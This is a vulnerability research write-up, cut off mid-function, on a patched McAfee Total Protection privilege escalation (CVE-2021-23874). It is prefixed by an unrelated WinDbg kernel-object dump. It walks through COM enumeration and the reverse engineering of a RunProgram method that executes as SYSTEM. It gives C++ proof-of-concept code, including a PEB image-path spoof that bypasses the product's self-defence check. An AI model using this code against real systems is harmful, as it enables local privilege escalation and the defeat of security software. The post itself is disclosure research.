   +0x000 PointerCount     : 0n32770
   +0x008 HandleCount      : 0n1
   +0x008 NextToFree       : 0x00000000`00000001 Void
   +0x010 Lock             : _EX_PUSH_LOCK
   +0x018 TypeIndex        : 0xe9 ''
   +0x019 TraceFlags       : 0 ''
   +0x019 DbgRefTrace      : 0y0
   +0x019 DbgTracePermanent : 0y0
   +0x01a InfoMask         : 0xa ''
   +0x01b Flags            : 0 ''
   +0x01b NewObject        : 0y0
   +0x01b KernelObject     : 0y0
   +0x01b KernelOnlyAccess : 0y0
   +0x01b ExclusiveObject  : 0y0
   +0x01b PermanentObject  : 0y0
   +0x01b DefaultSecurityQuota : 0y0
   +0x01b SingleHandleEntry : 0y0
   +0x01b DeletedInline    : 0y0
   +0x01c Reserved         : 0
   +0x020 ObjectCreateInfo : 0xffffad8c`d8e40cc0 _OBJECT_CREATE_INFORMATION
   +0x020 QuotaBlockCharged : 0xffffad8c`d8e40cc0 Void
   +0x028 SecurityDescriptor : 0xffffc284`3dd85eae Void
   +0x030 Body             : _QUAD
lkd> db nt!ObpInfoMaskToOffset L10
fffff807`72625e20  00 20 20 40 10 30 30 50-20 40 40 60 30 50 50 70  .  @.00P @@`0PPp
lkd> dx (nt!_OBJECT_HEADER_NAME_INFO*)(0xffffad8d190c0050 - ((char*)0xfffff807`72625e20)[(((nt!_OBJECT_HEADER*)0xffffad8d190c0050)->InfoMask & 3)])
(nt!_OBJECT_HEADER_NAME_INFO*)(0xffffad8d190c0050 - ((char*)0xfffff807`72625e20)[(((nt!_OBJECT_HEADER*)0xffffad8d190c0050)->InfoMask & 3)])                 : 0xffffad8d190c0030 [Type: _OBJECT_HEADER_NAME_INFO *]
    [+0x000] Directory        : 0xffffc283fb072730 [Type: _OBJECT_DIRECTORY *]
    [+0x008] Name             : "MyTestJob" [Type: _UNICODE_STRING]
    [+0x018] ReferenceCount   : 0 [Type: long]
    [+0x01c] Reserved         : 0x0 [Type: unsigned long]

Discovering and exploiting McAfee COM-objects (CVE-2021-23874)

17 May 2021 at 23:00

0x00: Introduction

In February McAffee fixed 2 vulnerabilities (CVE-2021-23874 and CVE-2021-23875) in their flagship consumer anti-virus (AV) product McAfee Total Protection. These issues were local privilige escalations and CVE-2021-23874 was present in McAfee’s COM-object. As it seems to me the topic of hunting bugs in COM-objects isn’t very well covered on the Internet. So this post should fill this gap and show an approach to finding COM-object’s bugs with an example CVE-2021-23874. On the other hand, the post can be considered as a real world walkthrough with OleViewDotNet (OVDN).

0x01: Prerequisites

To successfully reproduce the steps described in the following sections, you need:

  1. McAfee Total Protection 16.0 R28;
  2. OVDN commit 55b5cb0 (and later). An up-to-dated version is necessary, since it fixes bugs that are needed for correct work of used cmdlets, and these fixes haven’t been included in the v1.11 release yet;
  3. OS Windows (any version, but I used 2004 x64);
  4. WinDbg;
  5. IDA Free or any other powerful disassembler.

0x02: Attack Surface Enumeration

If we are hunting for LPE in COM-objects of a specific Product and in this case it is McAfee Total Protection, then we are interested in objects with 3 following characteristics:

  1. COM-objects are installed into the system by this particular Product;
  2. COM-objects are launched out-of-process (OOP) in the context of a privileged user (in this case “NT Authority\System”);
  3. We have access to the COM-object interface from our privilege level.

All 3 characteristics are mandatory, so let’s go in order.

An obvious and pretty simple approach to find the COM-objects installed by product is to take the first snapshot before installation, then install the product, take the second snapshot after installation and compare with each other. This can be done using ASA, but we will do it with OVDN, since it is more scriptable, fast and easy for further research.

To collect an initial snapshot of installed COM-objects we need to run powershell with the specified bitness (in this case x86), import OVDN and type the following commands:

PS C:\> $comDb_old = Get-ComDatabase -PassThru
PS C:\> Set-ComDatabase -Path ComDb_old.db -Database $comDb_old 

The powershell’s bitness is important because of the way the OVDN works: for example, x64 version can collect COM-objects information only from *\SOFTWARE\Classes, and x86 - only from *\SOFTWARE\WOW6432Node\Classes. At the same time, x64 version can parse both x64 and WoW64-processes, and x86 version - only WoW64-processes. Thus, there is no single rule of when and what OVDN of a specific bitness can do, but I can give simple advice to use 32-bit OVDN for 32-bit COM-entries, 64-bit OVDN - for 64-bit entries. And for security research use both versions.

The above commands collect information about registered COM-objects and serialize it to the file ComDb_old.db. Next, we need to install the product. In this case, it is McAfee Total Protection 16.0 R28. And after a successful installation, we collect the database of registered COM-objects again and find the differences with the snapshot collected in the previous step:

PS C:\> $comDb = Get-ComDatabase -PassThru
PS C:\> $comDb_old = Get-ComDatabase -Path ComDb_old.db -PassThru
PS C:\> $comDiff = Compare-ComDatabase -Left $comDb_old -Right $comDb -DiffMode RightOnly

Now we have a list of changes in variable $comDiff and we want to filter them to see OOP COM-objects running under the “NT Authority\System” account and accessible from our privilege level:

PS C:\> $comsAsSystem = $comDiff.AppIDs.Values | `
    Where-Object -FilterScript { $_.IsService -eq $True -or $_.RunAs -ieq "nt authority\system" }
PS C:\> $comsAsSystem | `
    Select-ComAccess -ProcessId (Get-Process -Name explorer).Id -Principal S-1-5-18

Name                     AppID                                IsService  HasPermission
----                     -----                                ---------  -------------
lfsvc                    020fb939-2c8b-4db7-9e90-9527966e38e5 True       True
AppReadiness Service     88283d7c-46f4-47d5-8fc2-db0b5cf0cb54 True       True
Bluetooth AVCTP Service  b98c6eb5-6aa7-471e-b5c5-d04fd677db3b True       True

When in second command we test for accessible COM-objects, we must use the -Principal parameter to replace SELF SID with appropriate SID under which the COM-object will run. As we can see from the command output, there are no McAfee’s COM-objects in the system accessible from our privilege level. And here, in theory, the research could end but if we remember that access in terms of the cmdlet Select-ComAccess means to have rights to launch and access COM-object, then we can try to see objects accessible only for launch:

PS C:\> $comsAsSystem | `
    Select-ComAccess -ProcessId (Get-Process -Name explorer).Id -Principal S-1-5-18 -LaunchAccess ActivateLocal, ExecuteLocal -Access 0

Name                           AppID                                IsService  HasPermission
----                           -----                                ---------  -------------
lfsvc                          020fb939-2c8b-4db7-9e90-9527966e38e5 True       True
Experimentation Broker         2568bfc5-cdbe-4585-b8ae-c403a2a5b84a True       True
netman                         27af75ed-20d9-11d1-b1ce-00805fc1270e True       True
McGenericCacheShim Class       67bc8c92-fa16-4991-9156-9ccba3584e5e True       True
McAfee LAM Repair Class        6be14203-35ad-4380-a10e-e7cb19471e44 False      False
Windows Insider Service        7006698d-2974-4091-a424-85dd0b909e23 True       True
HomeNetSvc                     73779221-6e6e-46d8-927e-63f67390d095 False      False
McAWFwk                        77b97c6a-cd4e-452c-8d99-08a92f1d8c83 True       False
MSC Protection Manager Serv... 7a0bf9a1-9298-48cb-9db4-b167469ebe5c False      False
McAWFwk                        7d555a20-6721-4c54-9713-6a0372868c62 True       False
AppReadiness Service           88283d7c-46f4-47d5-8fc2-db0b5cf0cb54 True       True
McAfee MCODS                   9a949ab4-7f25-4fea-bfe6-efa897d48401 False      False
Bluetooth AVCTP Service        b98c6eb5-6aa7-471e-b5c5-d04fd677db3b True       True
Platform Services Subsystem    ba79a213-d326-4fb8-89eb-deb2d5b82930 False      False
LxpSvc                         bce82fb7-43f4-4827-a503-69e561667293 True       False
McAfee VirusScan Announcer     decbf619-9830-47cd-870e-975f7fbc28bc False      False
OneSetttings Broker            e055b85b-22bd-4e15-a34d-46c58ab320ad True       True
McMPFSvc                       e0ad45ad-96c8-4a6a-891f-cfd9781b7c59 False      False
Feature Usage Listener         eab99738-0adf-4a53-856c-de58afde7682 True       True

Now we see a list of more COM-objects, among which there are objects that clearly belong to the product McAfee Total Protection. Still, we can launch some instances of COM-objects of interest to us. Let’s take one of them, for example with AppId 77b97c6a-cd4e-452c-8d99-08a92f1d8c83, and figure out why there is no full access rights, but there is launch access rights:

PS C:\> $coManageOemAppId = Get-ComAppId -AppId 77b97c6a-cd4e-452c-8d99-08a92f1d8c83
PS C:\> $coManageOemAppId.ClassEntries

Name                CLSID                                DefaultServerName
----                -----                                -----------------
CoManageOem Class   77b97c6a-cd4e-452c-8d99-08a92f1d8c83 <APPID HOSTED>
PS C:\> $coManageOemAppId

Name      AppID                                IsService  HasPermission
----      -----                                ---------  -------------
McAWFwk   77b97c6a-cd4e-452c-8d99-08a92f1d8c83 True       False

The COM-object CoManageOem Class with AppId name McAWFwk uses the default security descriptor. So let’s decode the default launch rights in human-readable form:

PS C:\> Show-ComSecurityDescriptor -SecurityDescriptor $coManageOemAppId.DefaultLaunchPermission

Launch rights for 77b97c6a-cd4e-452c-8d99-08a92f1d8c83

And decode the default access rights:

PS C:\> Show-ComSecurityDescriptor -SecurityDescriptor $coManageOemAppId.DefaultAccessPermission -ShowAccess

Access rights for 77b97c6a-cd4e-452c-8d99-08a92f1d8c83

All right, COM-object’s security descriptor confirms the results obtained from the Select-ComAccess cmdlet.

0x03: COM-object Access Rights Check

In the previous section we saw that we can start the COM-server and get an instance of the implemented COM-object. But then we will not have access rights to call its methods. Obviously, this is not very promising for vulnerability hunting initial data, but still we will try to get a pointer to a COM-object instance:

PS C:\> $coManageOemClass = Get-ComClass -Clsid $coManageOemAppId.ComGuid
PS C:\> New-ComObject -Class $coManageOemClass
Exception calling "CreateInstanceAsObject" with "2" argument(s): "No such interface supported
No such interface supported
"
At C:\...\OleViewDotNet.psm1:1601 char:17
+ ...             $obj = $Class.CreateInstanceAsObject($ClassContext, $Remo ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : InvalidCastException

We cannot create an object because the interface is not supported. Which one? IClassFactory. CreateInstanceAsObject internally uses CoCreateInstance, which encapsulates the following code:

CoGetClassObject(rclsid, dwClsContext, NULL, IID_IClassFactory, &pCF); 
hresult = pCF->CreateInstance(pUnkOuter, riid, ppvObj) 
pCF->Release();

And the error is thrown because, as we’ll see this a little further, the factory doesn’t implement the IClassFactory interface.

Then let’s try to look the interfaces that the COM-object implements:

PS C:\> Get-ComClassInterface $coManageOemClass | Select Name, Iid

Nothing. Here is the same problem as in the previous case. Internally OVDN, to get a list of supported interfaces, creates an object using CoCreateInstance, and then calls QueryInterface for a set of known interfaces, then for all interfaces registered in HKCR\Interface, and then using the IInspectable interface. But since for a successful call to CoCreateInstance it is necessary that the factory implements the IClassFactory interface, it is impossible to create an object and therefore it is impossible to query it for the implementation of other interfaces.

Let’s try to look the interfaces that the COM-object factory implements:

PS C:\> Get-ComClassInterface -Factory $coManageOemClass | Select Name, Iid

Name            Iid
----            ---
IMarshal        00000003-0000-0000-c000-000000000046
IMarshal2       000001cf-0000-0000-c000-000000000046
IUnknown        00000000-0000-0000-c000-000000000046
IMcClassFactory fd542581-722e-45be-bed4-62a1be46af03

IMcClassFactory interface looks interesting. We can quickly see what it is by analyzing the ProxyStub:

PS C:\> Get-ComInterface -Name IMcClassFactory | Get-ComProxy | Format-ComProxy

[Guid("fd542581-722e-45be-bed4-62a1be46af03")]
interface IMcClassFactory : IUnknown {
    HRESULT Proc3(/* Stack Offset: 4 */ [In] int p0, /* Stack Offset: 8 */ [In, Out] /* C:(FC_TOP_LEVEL_CONFORMANCE)(4)(FC_ZERO)(FC_ULONG)(0) */ byte[]* p1, /* Stack Offset: 12 */ [In] GUID* p2, /* Stack Offset: 16 */ [Out] /* iid_is param offset: 12 */ IUnknown** p3);
}

Proc3 declaration is very similar to IClassFactory::CreateInstance. But this is just an observation.

From powershell we can create a factory object and get a pointer to it, thus starting the COM-server:

PS C:\> $coManageOemFactory = New-ComObjectFactory -Class $coManageOemClass
Exception calling "Wrap" with "2" argument(s): "Unable to cast COM object of type 'System.__ComObject' to interface
type 'OleViewDotNet.IClassFactory'. This operation failed because the QueryInterface call on the COM component for the
interface with IID '{00000001-0000-0000-C000-000000000046}' failed due to the following error: No such interface
supported (Exception from HRESULT: 0x80004002 (E_NOINTERFACE))."
At C:\...\OleViewDotNet.psm1:90 char:13
+             [OleViewDotNet.Wrappers.COMWrapperFactory]::Wrap($Object, ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : InvalidCastException

The error occurs because the code inside New-ComObjectFactory is trying to wrap an object in a callable wrapper that implements the IClassFactory interface, but this COM-object doesn’t implement it (as we already know). Let’s try to create object without a wrapper:

PS C:\> $coManageOemFactory = New-ComObjectFactory -Class $coManageOemClass -NoWrapper

Good. We created a factory instance and got a raw pointer to it. This pointer is pretty useless in powershell:

PS C:\> $coManageOemFactory
System.__ComObject

But it is important for us that we have started the server that hosts the COM-object. And now we can investigate the process:

PS C:\> $coManageOemAppId.ServiceName
McAWFwk

The COM-object is hosted in the service McAWFwk, respectively, in the process with the name McAWFwk.exe. And we can see once again (now dynamically), if we have access to the COM-object in the process McAWFwk.exe. For COM-process parsing we use cmdlet Get-ComProcess and for access checking - already known Select-ComAccess:

PS C:\> Get-ComProcess -Name McAWFwk | Select-ComAccess -ProcessId (Get-Process -Name explorer).Id
ProcessId            : 396
ExecutablePath       : C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe
Name                 : McAWFwk
Ipids                : {IPID: 00001000-018c-0000-0e32-16ac744c0ec0 IRundown,
                       IPID: 00008801-018c-ffff-b88b-86753a985eda IRundown,
                       IPID: 00009002-018c-0000-c423-83b6f2efa724 ILocalSystemActivator,
                       IPID: 00008803-018c-0000-a9f7-7cb9cdfdb224 IUnknown}
RunningIpids         : {IPID: 00001000-018c-0000-0e32-16ac744c0ec0 IRundown,
                       IPID: 00008801-018c-ffff-b88b-86753a985eda IRundown,
                       IPID: 00009002-018c-0000-c423-83b6f2efa724 ILocalSystemActivator,
                       IPID: 00008803-018c-0000-a9f7-7cb9cdfdb224 IUnknown}
Is64Bit              : True
AppId                : 7d555a20-6721-4c54-9713-6a0372868c62
AccessPermissions    : D:NO_ACCESS_CONTROL
LRpcPermissions      : D:(A;;0xeff3ffff;;;WD)(A;;0xeff3ffff;;;AN)(A;;GR;;;AC)(A;;GR;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256)
User                 : NT AUTHORITY\SYSTEM
UserSid              : S-1-5-18
...

Select-ComAccess returned the COM-process object, which means that we have access to it from our privilege level. And we can see that COM-object has no access control. But why? We saw in the previous section the prohibitive access rights.

0x04: Bug

In order to understand what is going on, it is enough to attach using a debugger (in this case WinDbg) to the McAWFwk service at its start and set a breakpoint to the beginning of the function CoInitializeSecurity. Having done this, let’s see the parameters passed to the function:

kd> k
 # Child-SP          RetAddr           Call Site
00 000000eb`4f4ffc78 00007ff7`0a2cddc4 combase!CoInitializeSecurity [onecore\com\combase\dcomrem\security.cxx @ 3178] 
01 000000eb`4f4ffc80 00000000`00000208 McAWFwk+0xddc4
02 000000eb`4f4ffc88 000000eb`4f2ff980 0x208
03 000000eb`4f4ffc90 000000eb`4f4ffce0 0x000000eb`4f2ff980
04 000000eb`4f4ffc98 000000eb`4f2ff980 0x000000eb`4f4ffce0
05 000000eb`4f4ffca0 00000000`00000000 0x000000eb`4f2ff980
kd> dv /i
prv param             pVoid = 0x00000000`00000000
prv param          cAuthSvc = 0n-1
prv param         asAuthSvc = 0x00000000`00000000
prv param        pReserved1 = 0x00000000`00000000
prv param      dwAuthnLevel = 0
prv param        dwImpLevel = 3
prv param        pReserved2 = 0x00000000`00000000
prv param    dwCapabilities = 0
prv param        pReserved3 = 0x00000000`00000000
prv local        stackTrace = class ObjectLibrary::ReferencedPtr<StackTrace>
...

The displayed stack is a little bit wrong, but the last frames are correct and that’s enough for us. It is important that the pSecDesc parameter is nullptr and dwCapabilities is also 0. What this means can be found on msdn, but I like the explanation from the book “Inside COM+: Base Services”:

If neither the EOAC_APPID nor EOAC_ACCESS_CONTROL flag is set in the dwCapabilities parameter, CoInitializeSecurity interprets pSecDesc as a pointer to a Win32 security descriptor structure that is used for access checking. If pSecDesc is NULL, no ACL checking is performed.

I.e. the COM-object has a safe default DACL in the registry, which does not allow us to access the object from our privilege level. But at startup the COM-object overrides it and makes itself available to the attacker. It is interesting that this attack surface is absent in static analysis, but appears in dynamic.

Obviously, we get an attack surface that was not foreseen at the design stage. Therefore it becomes very promising to hunting bugs in this component.

0x05: COM-object Implementation RE

The next important question is the functionality that this COM-object implements and exposes. The only way to research this is reverse engineering (RE). And the starting point will be to find out the address of the vtable of the COM-object factory:

PS C:\> (Get-ComProcess -Name McAWFwk -ParseRegisteredClasses).Classes | Format-List
Name         :
Clsid        : 77b97c6a-cd4e-452c-8d99-08a92f1d8c83
ClassEntry   :
ClassFactory : 140702464808720
VTable       : McAWFwk+0x56F78
Apartment    : MTA
RegFlags     : MULTIPLEUSE
Cookie       : 34
ThreadId     : -1
Context      : INPROC_SERVER, LOCAL_SERVER
ProcessID    : 396
ProcessName  : McAWFwk
Registered   : False
Process      : 396 McAWFwk

Name         :
Clsid        : 7d555a20-6721-4c54-9713-6a0372868c62
...

Next we go to the disassembler (in this case IDA) and see the table of virtual methods of the COM-object factory at address McAWFwk+0x56F78:

CoManageOemFactory virtual table

Obviously, we are interested in Proc3. Based on the logic of the factory this function will allow you to create an object - the method presented in the vtable after QueryInterface, AddRef and Release. Here’s a simplified listing of Proc3, which I named CoManageOEMFactory::InternalCreateObjectWrapper:

InternalCreateObjectWrapper listing

The method CoManageOEMFactory::InternalCreateObjectWrapper checks that the call comes from a valid module and delegates the work to Proc4 from CoManageOemFactory vtable. The parameters are passed as-is. Since the COM-object is OOP, our code does not in any way affect the validity of the module from which InternalCreateObjectWrapper is called, and therefore the ValidateModule check will always be successful and will return 0, which will prevent us from getting the ACCESS_DENIED error.

Let’s look at the listing of Proc4 (or as I named it CoManageOEMFactory::InternalCreateObject):

InternalCreateObject listing

As we can see in the above listing, the method calls the McCreateInstance function with the arguments GUID e66d03f6-c1cf-4d8c-997c-fae8763375f6 and IID 9b6c414a-799d-4506-87d1-6eb78d0a3580. Next in the pManageOem argument we get a pointer to the COM-object from which the user-specified interface is queried. Let’s see what happens in the McCreateInstance function:

McCreateInstance listing

McCreateInstance receives a pointer to the IMcClassFactory factory interface of the object, the CLSID of which was passed as an argument, and then, using this factory, creates an object and returns an interface pointer of the specified type to the object. In fact, McCreateInstance is semantically identical to CoCreateInstance, with the difference that the latter uses the IClassFactory interface to create an object, and the former uses IMcClassFactory.

Now it is clear that the method CoManageOEMFactory::InternalCreateObjectWrapper creates within itself an object with CLSID e66d03f6-c1cf-4d8c-997c-fae8763375f6 that implements the IMcClassFactory factory, then queries the specified interface and returns it to the client. Let’s see what kind of object is being created:

PS C:\> $manageOemClass = Get-ComClass -PartialClsid 'e66d03f6'
PS C:\> $manageOemClass

Name             CLSID                                DefaultServerName
----             -----                                -----------------
ManageOem Class  e66d03f6-c1cf-4d8c-997c-fae8763375f6 McDspWrp.dll

PS C:\> Get-ComClassInterface -ClassEntry $manageOemClass
PS C:\> Get-ComClassInterface -ClassEntry $manageOemClass -Factory

Name             IID                                  Module        VTableOffset
----             ---                                  ------        ------------
IUnknown         00000000-0000-0000-c000-000000000046 McDspWrp.dll  1012304
IMcClassFactory  fd542581-722e-45be-bed4-62a1be46af03 McDspWrp.dll  1012304

Again, we cannot get a list of interfaces that the COM-object implements, since its factory doesn’t implement IClassFactory interface. Then let’s see the definition of the interface 9b6c414a-799d-4506-87d1-6eb78d0a3580 that is queried from the COM-object in the method CoManageOEMFactory::InternalCreateObjectWrapper:

PS C:\> Get-ComInterface -PartialIid '9b6c414a'

Name        IID                                  HasProxy  HasTypeLib
----        ---                                  --------  ----------
IManageOem  9b6c414a-799d-4506-87d1-6eb78d0a3580 True      True

For the interface IManageOem, there is a ProxyStub Dynamic-Link Library (DLL), which can be decompiled, and a TypeLib, from which information can be extracted. We use a TypeLib because it contains more information:

PS C:\> $manageOemTypeLib = Get-ComTypeLib -Iid 9b6c414a-799d-4506-87d1-6eb78d0a3580
PS C:\> Get-ComTypeLibAssembly $manageOemTypeLib | Format-ComTypeLib

The output contains many different types, structures and interface definitions from TypeLib, but for us the only interesting thing is the definition of interface IManageOem:

[Guid("9b6c414a-799d-4506-87d1-6eb78d0a3580")]
interface IManageOem : IDispatch
{
   /* Methods */
   string GetTempFileName(string bstrPath);
   tagMCREGIST_RETURN_CODE RunProgram(string bstrExePath, string bstrCmdLine);
   ...
   object RunProgramAndWait(string bstrAppName, string bstrCmdLine);
   object RunProgramAndWaitEx(string bstrAppName, string bstrCmdLine, string bstrWorkingDir);
   ...
   tagMCREGIST_RETURN_CODE RegCreateKey(string bstrKeyPath);
   tagMCREGIST_RETURN_CODE RegDeleteKey(string bstrKeyPath);
   ...
   tagMCREGIST_RETURN_CODE RegSetValue(string bstrKeyPath, string bstrValueName, object vValue);
   tagMCREGIST_RETURN_CODE RegDeleteValue(string bstrKeyPath, string bstrValueName);
   ...
   tagMCREGIST_RETURN_CODE IniWriteValue(string bstrIniFilePath, string bstrSectionName, string bstrKeyName, [Optional] object vValue);
   ...
   bool RemoveFiles(string bstrFilePath);
   ...
   bool CopyFiles(string bstrSourcePath, string bstrDestPath, bool vbFailIfExists);
   bool RemoveFolder(string bstrFolder, bool vbDelSubFolders);
   ...
   bool SetFileAttributes(string bstrFilePath, int lAttributes);
   ...
   void CreateTaskScheduleEntry(string bstrTaskname, object dwNextrun, object dwDefaultFreq);
   void DeleteTask(string bstrTaskname);
   ...
   string ReadFile(string varFilePath, bool bBase64);
   ...
}

The interface IManageOem contains many attractive methods, but only the most promising are shown in the listing above. To find out the address of the function that implements the specific interface method, we must take the following steps:

  1. Attach WinDbg to McAWFwk.exe process and set a breakpoint on the instruction after returning from the McCreateInstance function;
  2. Write and execute client code that will call the CoManageOEMFactory::InternalCreateObject method;
  3. Dump the returned in step 1 memory and find the address of the function by index.

To find the instruction on which to set a breakpoint, we need to disassemble the method CoManageOEMFactory::InternalCreateObject implemented in McAWFwk.exe binary:

InternalCreateObject disasm

Instruction test rcx, rcx at address McAWFwk + 0xc2f1 checks the value of the pointer pManageOem returned from the function McCreateInstance. So, after the successful completion of the function McCreateInstance, the register rcx contains the address of the object, at offset 0 in which address of the first virtual table is located.

Client code that calls the method CoManageOEMFactory::InternalCreateObject is shown below:

class __declspec(uuid("fd542581-722e-45be-bed4-62a1be46af03")) IMcClassFactory :
    public IUnknown
{
public:
    virtual HRESULT __stdcall InternalCreateObject(
        _In_ REFIID riid,
        _COM_Outptr_ void **ppvObject);
};

_COM_SMARTPTR_TYPEDEF(IMcClassFactory, __uuidof(IMcClassFactory));

int main()
{
    try
    {
        HRESULT hr = ::CoInitializeEx(0, COINIT_MULTITHREADED);
        if (FAILED(hr))
            throw std::runtime_error("CoInitializeEx failed. Error: " + std::to_string(hr));
        auto coUninitializeOnExit = wil::scope_exit([] {::CoUninitialize(); });

        const GUID CLSID_CoManageOem =
            { 0x77b97c6a, 0xcd4e, 0x452c, { 0x8d, 0x99, 0x08, 0xa9, 0x2f, 0x1d, 0x8c, 0x83 } };
        IMcClassFactoryPtr pMcClassFactory;

        hr = ::CoGetClassObject(
            CLSID_CoManageOem,
            CLSCTX_LOCAL_SERVER,
            nullptr,
            IID_PPV_ARGS(&pMcClassFactory));
        if (FAILED(hr))
            throw std::runtime_error("CoGetClassObject failed. Error: " + std::to_string(hr));

        IUnknownPtr pManageOem;

        hr = pMcClassFactory->InternalCreateObject(
            __uuidof(pManageOem), reinterpret_cast<LPVOID *>(&pManageOem));
        if (FAILED(hr))
            throw std::runtime_error("InternalCreateObject failed. Error: " + std::to_string(hr));
    }
    catch (const std::exception &e)
    {
        std::cerr << "Exception: " << e.what() << std::endl;
        return -1;
    }

    return 0;
}

The code is self-explained and I think it doesn’t need any comments. But as a result of the execution of the above code, the program ends with the following error: “Exception: InternalCreateObject failed. Error: -2147024891”. Decimal number -2147024891 converts to the more familiar hexadecimal number 0x8007005 (access denied). But where did error come from? We’ve already seen that COM-object permissions allow us to have access to object’s methods. After a bit of debugging I found that the error returns ProxyStub DLL loaded in client’s application. The code preceding the sending request to create an object is similar to the following:

InternalCreateObjectProxy listing

Check is client-side and it’s obvious that it can be bypassed, but since at the moment the primary task is to examine the methods provided by the COM-object, now we will bypass the validation using the debugger capabilities, and a full bypass will be presented in the next section.

Now when we can set a breakpoint, when the object is already completely constructed and can trigger its creation, it remains to dump its virtual function table. After hitting a breakpoint it will look like this:

kd> bp McAWFwk+0xc2f1
kd> g
Breakpoint 0 hit
McAWFwk+0xc2f1:
0033:00007ff6`a764c2f1 4885c9          test    rcx,rcx
kd> dps poi(rcx)
00007ff8`1a126df8  00007ff8`1a04d058 McDspWrp+0x1d058
00007ff8`1a126e00  00007ff8`1a03c354 McDspWrp+0xc354
00007ff8`1a126e08  00007ff8`1a04cff8 McDspWrp+0x1cff8
00007ff8`1a126e10  00007ff8`1a05cb80 McDspWrp+0x2cb80
00007ff8`1a126e18  00007ff8`1a04d0d0 McDspWrp+0x1d0d0
00007ff8`1a126e20  00007ff8`1a04d134 McDspWrp+0x1d134
00007ff8`1a126e28  00007ff8`1a04d140 McDspWrp+0x1d140
00007ff8`1a126e30  00007ff8`1a04d2d4 McDspWrp+0x1d2d4
00007ff8`1a126e38  00007ff8`1a04d358 McDspWrp+0x1d358
00007ff8`1a126e40  00007ff8`1a04d3dc McDspWrp+0x1d3dc
00007ff8`1a126e48  00007ff8`1a04d460 McDspWrp+0x1d460
00007ff8`1a126e50  00007ff8`1a04d614 McDspWrp+0x1d614
00007ff8`1a126e58  00007ff8`1a04d638 McDspWrp+0x1d638
00007ff8`1a126e60  00007ff8`1a04d208 McDspWrp+0x1d208
00007ff8`1a126e68  00007ff8`1a05c168 McDspWrp+0x2c168
00007ff8`1a126e70  00007ff8`1a04d1e8 McDspWrp+0x1d1e8

The interface IManageOem inherits from IDispatch interface. The interface IDispatch defines 7 methods, so it is obvious that the method RunProgram will be the 7th (numbered from 0) in virtual function table, but in practice, this method was only 14th, with an address McDspWrp+0x2c168. I don’t know why this mismatch is, but my guess is that the cmdlet Get-ComTypeLibAssembly isn’t parsing the TypeLib correctly.

Now let’s look at the decompiled method IManageOem::RunProgram that implements ManageOem Class COM-object:

RunProgram listing

The above code takes attacker-controlled exePath and cmdLine and creates the child process without impersonation, from msdn:

The new process runs in the security context of the calling process

Thus, it is obvious that by calling this method a low-privileged user can execute an arbitrary file in the System context (since McAWFwk is a service) and escalate privileges.

Another interesting point is the code on line 20 that looks like a stack buffer overflow vulnerable. Let’s remember that the parameters are attacker-controlled, stack buffer CommandLine has a fixed size of 1040 widechars and wsprintfW writes these strings to the buffer. And if the attacker sends to the input a string longer than 1040 characters, then it is logical to expect that the return address will be overwritten. But this is not the case, since in the wsprintfW description is mentioned that “maximum size of the buffer is 1,024 bytes” and internally the function really does not write beyond 1024, but characters, not bytes.

As a result, we can launch and access the methods of the COM-object CoManageOem Class. This object implements the interface IMcClassFactory and in the method IMcClassFactory::InternalCreateObject returns an COM-object ManageOem Class, that implements the interface IManageOem. Exposed method IManageOem::RunProgram makes it easy to escalate privileges and run an arbitrary process in context “NT Authority\System”. There remains only one problem - self-defense implemented in the ProxyStub, and bypassing this mechanism will be discussed in the next section.

0x06: Self-Defense Bypass

As we saw in the previous section self-defense for COM-object implemented in ProxyStub DLL that is loaded (by design for marshalling parameters) into the address space of the client (attacker-controlled) process. So obviously we can just overwrite our own code to ignore the error returned from the validation function (I named it ValidateModule in the screenshot above). But this approach is not very robust, as the module may be recompiled in further versions of the product, offsets and instructions may change. And I don’t want to support all the older and newer versions. So we must choose a more elegant solution - find a weakness in the code logic.

The validation implemented in the ValidateModule function performs the following two steps:

  • Gets the path to the module from which the proxy is called using a code like (error handling omitted for simplicity):
hProcess = ::OpenProcess(..., ::GetCurrentProcessId());
::EnumProcessModules(hProcess, hModules, ...);

while (true)
{
    ::GetModuleInformation(hProcess, hModules[i], mi, ...);
    if ((mi->lpBaseOfDll <= callerAddress) && (callerAddress - mi->lpBaseOfDll < mi->SizeOfImage))
    {
        ::GetModuleFileNameExW(hProcess, hModules[i], fileName, ...);
        break;
    }

    ++i;
}

return fileName;
  • Validate the module using a function ValidateModule exported from the library vtploader.dll
hLibrary = ::LoadLibrary("vtploader.dll");
ValidateModule = ::GetProcAddress(v9, "ValidateModule");

ValidateModule(fileName);

We can spoof the path to the module from which the call originates, or we can craft the module to pass the check implemented in vtploader!ValidateModule. It is clear that the former is simpler and requires only a modification of the structure in PEB.

Here is the corresponding C++ code to modify the path to the main (our proof-of-concept (PoC) calls the proxy from the main module, so that’s enough ) binary in PEB::Ldr::InMemoryOrderModuleList:

void MasqueradeImagePath(PCWCHAR imagePath)
{
    PROCESS_BASIC_INFORMATION processBasicInformation;
    ULONG processInformationLength;

    auto ntStatus = ::NtQueryInformationProcess(
        ::GetCurrentProcess(),
        ProcessBasicInformation,
        &processBasicInformation,
        sizeof(processBasicInformation),
        &processInformationLength);
    if (!NT_SUCCESS(ntStatus))
        throw std::runtime_error("NtQueryInformationProcess failed. Error: " + std::to_string(ntStatus));

    UNICODE_STRING usImagePath;
    RtlInitUnicodeString(&usImagePath, imagePath);

    auto moduleBase = ::GetModuleHandle(NULL);
    if (!moduleBase)
        throw std::runtime_error("GetModuleHandle failed. Error: " + std::to_string(::GetLastError()));

    auto pPeb = processBasicInformation.PebBaseAddress;
    auto pLdr = pPeb->Ldr;
    auto pLdrHead = &pLdr->InMemoryOrderModuleList;
    auto pLdrNext = pLdrHead->Flink;

    while (pLdrNext != pLdrHead)
    {
        PLDR_DATA_TABLE_ENTRY LdrEntry = CONTAINING_RECORD(pLdrNext, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        if (LdrEntry->DllBase == moduleBase)
        {
            LdrEntry->FullDllName = usImagePath;
            break;
        }

        pLdrNext = LdrEntry->InMemoryOrderLinks.Flink;
    }
